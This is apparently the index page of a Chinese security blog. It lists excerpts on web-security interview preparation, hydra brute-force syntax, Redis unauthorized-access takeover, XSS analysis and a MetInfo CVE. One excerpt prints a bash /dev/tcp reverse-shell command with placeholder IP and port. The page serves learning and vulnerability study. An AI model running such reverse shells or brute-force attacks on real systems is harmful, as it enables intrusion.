m3lon


  • Home

  • About

  • Tags

  • Categories

Web安全面试准备一

Posted on 2020-03-16
之前实习面试时准备的资料,现在论文和工作都差不多定了,想起来可以分享一下,其中很多资料源于网络,也包含了部分自己的理解,现在回馈于网络,希望对准备面试的小伙伴们或许能起到一点帮助 OWASP TOP 10 注入 失效的身份认证(密码转储、字典攻击、钓鱼或社会工程之后发现失效的身份认证) 敏感数据泄漏(攻击者不是直接攻击,而是在传输过程中或从客户端窃取密钥、中间人攻击或者从服务器端窃取明文数据) XML外部实体(XXE) 失效的访问控制(比如越权 CORS配置错误导致允许未授权的API访问) 安全配置错误 跨站脚本(XSS) 不安全的反序列化 使用含有已知漏洞的组件 不足的日志记录和监控 SQ ...
Read more »

Web安全面试准备二

Posted on 2020-03-16
0x01 API接口测试👇Here 干货满满 1. 接口定义本质:数据的传输与接收 2. 接口类型2.1 RPC(Remote Procedure Call远程过程调用)如Java RMI 2.2 RESTful API REST,全称是 Resource Representational State Transfer,通俗来讲就是,资源在网络中以某种表现形式进行状态转移。分解开来: Resource:资源,即数据(前面说过网络的核心)。比如 newsfeed,friends等; Representational:某种表现形式,比如用JSON,XML,JPEG等; State Transf ...
Read more »

Apache httpOnly cookie disclosure引发的Cookie思考

Posted on 2020-03-15
昨天跟朋友一起看一个Apache httpOnly cookie disclosure的漏洞, 涉及到一些知识点, 记录下. 关于Apache httpOnly cookie disclosure这个漏洞, 详情可参考 https://www.t00ls.net/articles-21760.html 当低版本的apache接收到一个大于4k的cookie的时候,会返回一个400的错误,并且把所有的cookie完整的在页面当中显示出来,提示这个cookie过大,那么我们的攻击方式便是利用xss,给用户在正常的cookie的基础上再增加一些无用的cookie,使用户的cookie大于4k,然后j ...
Read more »

暴力破解工具-hydra命令总结

Posted on 2019-03-23 | In 工具教程
转载:http://www.luxinzhi.com/safe/438.html Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]] 命令参数: -R:继续从上一次进度接着破解-S:大写,采用S ...
Read more »

解决ubuntu crontab反弹shell失败的问题

Posted on 2019-03-18 | In 杂记
转载自:http://zone.secevery.com/article/972 这个问题的由来是因为自己在复现redis未授权访问漏洞时,通过向linux任务计划文件里写反弹shell的命令时,发现shell并不能反弹回来,之前使用的server端为Centos,一切顺利并没有出现这种问题,结果这次server换成了ubuntu,就出现不能反弹的问题,结果因为这个问题卡了很久,最终在kakaxi和ttgo2两位大佬的指导和帮助下才解决了该问题,将整个问题的解决过程在这里记录一下~ 环境说明ubuntu16.04桌面版:192.168.0.107,用来任务计划反弹shell的靶机 kali2. ...
Read more »

xss与浏览器编解码

Posted on 2019-03-17
今天看道哥的白帽子讲web安全中XSS的防御部分,不太明白,所以就查了相关的服务器编码与浏览器解码,做一下小总结吧。 参考:https://security.yirendai.com/news/share/26 这篇文章真是一场解惑的及时雨 浏览器解析过程 浏览器在解析HTML文档时无论按照什么顺序,主要有三个过程:HTML解析、JS解析和URL解析,每个解析器负责HTML文档中各自对应部分的解析工作。下面以一篇HTML文档解析来简单的讨论下解析器如何协同工作的。 首先浏览器接收到一个HTML文档时,会触发HTML解析器对HTML文档进行词法解析,这一过程完成HTML解码并创建DOM树,接下 ...
Read more »

反弹shell语句的理解

Posted on 2019-03-04
前言一直以来,只会有反弹shell的语句,却对其中的细节不甚了解,比如下面这句最经典的1/bin/bash -i >& /dev/tcp/[yourip]/[yourport] 0>&1 文件描述符三种标准的文件描述符 0 - stdin 标准输入1 - stdout 标准输出2 - stderr 标准错误输出 >&&根据后面的参数不同会有不同的结果。 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。 当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符 理解反弹shell语 ...
Read more »

Docker 常用命令备份

Posted on 2019-03-01
Docker vs 虚拟机传统虚拟机技术是虚拟出一套硬件后,在其上运行一个完整操作系统,在该系统上再运行所需应用进程;而容器内的应用进程直接运行于宿主的内核,容器内没有自己的内核,而且也没有进行硬件虚拟。因此容器要比传统虚拟机更为轻便 三个基本概念镜像操作系统分为内核和文件系统,而景象就相当于root文件系统。除了提供容器运行时所需的程序、库、资源、配置等文件外,还包含了一些为运行时准备的一些配置参数(如匿名卷、环境变量、用户等)。 容器容器与景象的关系就像是面向对象中的类与实例。容器的实质是进程,容器的进程运行在属于自己的独特的命名空间,因此容器可以拥有自己的root文件系统,自己的网络配置 ...
Read more »

Redis未授权访问

Posted on 2019-02-27
Reids介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 漏洞介绍Reids因配置不当可导致未授权访问漏洞,攻击者无需认证即可登陆Redis内部数据,可导致敏感信息泄漏;在特定条件下,Redis服务以root身份运行,攻击者可通过Reids命令给Root用户写入SSH公钥,直接通过SSH登陆受害服务器,导致服务器权限被获取、文件泄漏、重要数据删除、加密勒索等事件发生,严重威胁业务正常服务。 漏洞原因Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上, ...
Read more »

MetInfo 6.1.3 XSS漏洞分析

Posted on 2019-02-21
0x01 分析环境准备IDE:PhpstromMetInfo版本:6.1.3Web环境:phpStudy环境PHP版本:5.4.45 0x02 漏洞概述漏洞类型:XSS漏洞危险等级:中CVE编号:CVE-2018-19050发现者:m3lon漏洞位置:index.php中的第23行echo输出语句漏洞产生原因:echo输出的html代码中,langset值由外部输入获得,且没有做很好过滤受影响版本:全部版本修复版本:无 0x03 漏洞复现3.1 管理员登录管理后台使用firefox或IE浏览器访问localhost/met/admin/index.php, 登录管理后台 3.2 管理员访问 ...
Read more »
123
m3lon

m3lon

萌新一枚

30 posts
6 categories
4 tags
Links
  • Lambdax
  • skytina
  • l3m0n
  • StoneMoe
© 2018 — 2020 m3lon